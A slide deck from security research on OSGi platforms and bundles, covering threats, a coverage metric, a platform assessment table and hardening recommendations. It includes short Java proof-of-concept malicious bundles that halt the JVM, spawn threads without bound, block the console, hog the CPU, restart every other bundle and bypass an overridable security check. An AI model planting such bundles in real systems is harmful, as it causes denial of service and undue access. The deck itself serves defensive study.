Security in OSGi applications: Robust OSGi Platforms, secure Bundles

RESEARCH ON YOUR BEHALF

Pierre Parrend, 27.10.2009

Upload: kai-hackbarth

Post on 01-Jul-2015



Page 2: The vision

Dynamic applications
What happens if the WebCam driver is malware?

[Figure: diagram in three steps (1., 2., 3.) with the labels PDA, WebCam, Component Repository, SOP Platform (installed on the PDA), DriverLister Bundle and WebCamDriver Bundle.]

2 27.07.2009 Pierre Parrend – OSGi: Secure Platforms, secure bundles

Page 3: Existing applications

JBoss, Server-side Eclipse
• OSGi as application server
• Integration of open source bundles from several sources
• Abuse cases
  o Attacks through the web front end
  o Backdoor bundles inside the server

Yoxos secure source
• Validation of open source code
• Three levels
  o Access from a secure repository
  o Basic security analysis of code
  o TÜV Certified security audit: external reach, malicious behavior

Page 4: Outline

Java Security
Assessment method
Robust OSGi Platforms
Secure Bundles
An integration

Page 5: Java1: Do not trust the Bytecode

The Bytecode validation process

Page 6: Java2: From the Sandbox to Permission Domains

[Figure panels: JDK 1.1, JDK 1.2] [LiGong1997]

Page 7: OSGi-based Applications: Threats

Exploitation of the platform
Exploitation of the 3rd party bundles


Page 9: A Metric for Security Protection

The Coverage Metric
• Percentage of the known vulnerabilities that are protected
• Based on the Attack Surface metric
• Makes it possible to
  o Assess individual security mechanisms
  o Compare execution environments

C


Page 11: Security Issues in OSGi Platforms

The OSGi Platform Threats

Denial of service
• Platform stop
• Resource consumption
• Blocking the console

Undue access
• Bundle Management
• Bundle code

[Figure: layer diagram with the labels Host, JVM, Module layer, Life-cycle layer, Service layer.]

Page 12: Stopping the Platform

Stop your application

Simple example
• Bundleized application

Just crash it

Thread management features do not help

Bytecode Forgery is another way to crash the JVM

    import org.osgi.framework.BundleActivator;
    import org.osgi.framework.BundleContext;
    public class RuntimeHaltActivator implements BundleActivator {
        // Halts the JVM, and with it the whole platform, as soon as the bundle starts.
        public void start(BundleContext context) {
            Runtime.getRuntime().halt(0);
        }
        public void stop(BundleContext context) {}
    }

    public class Stopper extends Thread {
        // Every thread starts three more, so the number of threads grows without bound.
        public void run() {
            Stopper tt = new Stopper();
            tt.start();
            Stopper tt2 = new Stopper();
            tt2.start();
            Stopper tt3 = new Stopper();
            tt3.start();
        }
    }

Page 13: Blocking the console

Simply sleepy

Management actions no longer possible

    import org.osgi.framework.BundleActivator;
    import org.osgi.framework.BundleContext;
    public class SleepingBundleActivator implements BundleActivator {
        // start() does not return for 50 seconds.
        public void start(BundleContext context) {
            try {
                int sec = 50;
                Thread.sleep(sec * 1000);
            } catch (InterruptedException e) {
                e.printStackTrace();
            }
        }
        public void stop(BundleContext context) {}
    }

Resource greedy

Also consume most of the available CPU

    import org.osgi.framework.BundleActivator;
    import org.osgi.framework.BundleContext;
    public class InfStartupLoopActivator implements BundleActivator {
        // start() never returns and keeps one CPU busy.
        public void start(BundleContext context) {
            while (true) {}
        }
        public void stop(BundleContext context) {}
    }

Page 14: Playing with the bundles of your neighbour applications

    import org.osgi.framework.Bundle;
    import org.osgi.framework.BundleActivator;
    import org.osgi.framework.BundleContext;
    public class PiratBundleManagerActivator implements BundleActivator {
        // Stops and restarts every bundle installed on the platform.
        public void start(BundleContext context) {
            try {
                Bundle[] bundleList = context.getBundles();
                String symbolicName;
                for (int i = 0; i < bundleList.length; i++) {
                    symbolicName = bundleList[i].getSymbolicName();
                    bundleList[i].stop();
                    bundleList[i].start();
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        public void stop(BundleContext context) {}
    }

Page 15: Some other issues

Denial of service
• Consume memory
• Fill the disk
• Saturate the service registry

Illegal access
• Exploit split packages

Page 16: Assessment of OSGi Platforms

Platform Type                   # of protected Vulns   # of identified Vulns   Coverage
Concierge                       0                      28                      0 %
Felix                           1                      32                      3,1 %
Knopflerfish                    1                      31                      3,2 %
Equinox                         4                      31                      13 %
Java Permissions                13                     32                      41 %
Concierge with Permissions      10                     28                      36 %
Felix with Permissions          14                     32                      44 %
Knopflerfish with Permissions   14                     31                      44 %
Equinox with Permissions        17                     31                      55 %

Page 17: Hardened OSGi

Protection Rate: 25 % for the ‘Malicious Bundles’ catalog entries

Introduces
• Check component size before download, and control the cumulated size of loaded components
• Check digital signature at install time
• Launch the component activator in a separate Thread
• Limit the number of registered services

Systematizes
• Do not reject harmless unnecessary metadata
• Remove all component data from disk at uninstallation

[Figure labels: Hardened OSGi, Host]


Page 19: Security Issues in OSGi Bundles

OSGi bundles
• Shared resources exposed
• Vulnerabilities can be directly exploited
• Internal code can have more relaxed constraints

[Figure labels: Shared Objects, Shared Classes, Internal Code]

Page 20: Security Issues in OSGi Bundles

Point of view of the architecture

More issues
• Enforcement of component life-cycle
• Denial of service

[Figure labels: VM, Client, Isolation from the user, Isolation between components, Isolation from the environment, Access control]

Page 21: Access Control

Weak class Abuse

Generic issue to Java

    public class AlmostSecure {
        public AlmostSecure() {
            this.init();
        }
        // The security check lives in a method that subclasses can override.
        protected void init() {
            SecurityManager sm = System.getSecurityManager();
            if (sm != null) {
                // placeholder permission name
                sm.checkPermission(new RuntimePermission("almostSecure"));
            }
        }
    }

    public class AlmostSecureOverriden extends AlmostSecure {
        public AlmostSecureOverriden() {
            super();
        }
        // Empty override: the constructor of AlmostSecure no longer runs the check.
        protected void init() {}
    }

Page 22: Isolation between components

The service who likes to be manipulated

    public class HelloWorldServiceImpl implements HelloWorldService {
        // final fixes the reference only; any client can overwrite the array elements
        public final String[] myData = {"Param1", "Param2"};
        public void helloWorld() {
            System.out.println("Hello World");
        }
    }

Similar issues with static variables, mutable variables

The not so private data

    package fr.inria.ares.helloworld;
    public class HelloWorld {
        private class HelloWorldPrinter {
            private String textHello = "HelloWorld";
        }
    }

Corrected in Java 5

Page 23: Denial-of-Service

A controversial example
• Synchronized code
• Do you consider this a vulnerability?

Page 24: Recommendations (1/3)

Bundles should
• only have dependencies on bundles they trust
• never use synchronized statements that rely on third party code
• provide a hardened public code implementation following given recommendations

Page 25: Recommendations (2/3)

Shared Classes should
• provide only final static non-mutable fields
• set security manager calls during creation in all required places at the beginning of the method
  o all constructors
  o clone() method if the class is cloneable
  o readObject(ObjectInputStream) if the class is serializable
• have security check in final methods only
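
A shared class written to the recommendations for shared classes, as an added example that is not code from the slides. The class name, the `KIND` field and the permission name are placeholders chosen for this example.

```java
import java.io.*;

public class HardenedShared implements Serializable, Cloneable {
    private static final long serialVersionUID = 1L;
    public static final String KIND = "hardened";   // exposed field: final, static, immutable
    private final String value;

    public HardenedShared(String value) {
        checkAccess();                     // first statement of every constructor
        this.value = value;
    }

    // final: a subclass cannot replace the check with an empty body
    protected final void checkAccess() {
        SecurityManager sm = System.getSecurityManager();
        if (sm != null) {
            // placeholder permission name, chosen for this example
            sm.checkPermission(new RuntimePermission("example.hardenedShared"));
        }
    }

    @Override
    public final HardenedShared clone() throws CloneNotSupportedException {
        checkAccess();                     // clone() creates an instance without a constructor
        return (HardenedShared) super.clone();
    }

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        checkAccess();                     // so does deserialization
        in.defaultReadObject();
    }

    public final String getValue() { return value; }

    public static void main(String[] args) throws Exception {
        HardenedShared a = new HardenedShared("x");
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buf)) { out.writeObject(a); }
        try (ObjectInputStream in =
                 new ObjectInputStream(new ByteArrayInputStream(buf.toByteArray()))) {
            HardenedShared b = (HardenedShared) in.readObject();
            System.out.println(a.clone().getValue() + " " + b.getValue());
        }
    }
}
```

`System.getSecurityManager()` returns null when no security manager is installed, so the checks only take effect on a platform that runs with one; the API is deprecated since Java 17.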

Page 26: Recommendations (3/3)

Shared Objects (OSGi Services) should
• only have basic types and serializable final types as parameter
• perform copy and validation of parameters before using them
• perform data copy before returning a given object in a method
• returned object should be either a basic type or serializable
• not use Exceptions that carry any configuration information, and not serialize data unless a specific security mechanism is available
• never execute sensitive operations on behalf of other components
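
A service that copies and validates its parameters and copies what it returns, as an added example that is not code from the slides. The class name, `MAX_PARAMS` and the validation rules are assumptions.

```java
import java.util.Arrays;

public class HardenedHelloWorldService {
    private static final int MAX_PARAMS = 16;   // assumed limit for this example

    // volatile reference swap instead of synchronized(this): a client that locks
    // the service object cannot block other callers
    private volatile String[] params = {"Param1", "Param2"};

    /** Copies first, then validates the copy, so the caller cannot change it after the check. */
    public void setParams(String[] input) {
        if (input == null) throw new IllegalArgumentException("invalid parameters");
        String[] copy = input.clone();
        if (copy.length > MAX_PARAMS) throw new IllegalArgumentException("invalid parameters");
        for (String s : copy) {
            // generic message: no configuration detail leaks through the exception
            if (s == null || s.isEmpty()) throw new IllegalArgumentException("invalid parameters");
        }
        params = copy;
    }

    /** Returns a copy; callers never hold a reference to the internal array. */
    public String[] getParams() {
        return params.clone();
    }

    public static void main(String[] args) {
        HardenedHelloWorldService svc = new HardenedHelloWorldService();
        String[] mine = {"a", "b"};
        svc.setParams(mine);
        mine[0] = "tampered";              // caller changes its own array after the call
        String[] got = svc.getParams();
        got[1] = "tampered";               // caller changes the array it was handed
        System.out.println(Arrays.toString(svc.getParams()));
        try {
            svc.setParams(new String[] {"ok", null});
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```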

Page 27: Contact

Dr. Pierre Parrend
Senior Scientist

FZI Forschungszentrum Informatik
Haid-und-Neu-Str. 10-14
D-76131 Karlsruhe
Tel.: +49-721-9654-620
Fax: +49-721-9654-621
http://www.fzi.de/se

FZI Software Engineering Domain
http://www.fzi.de/se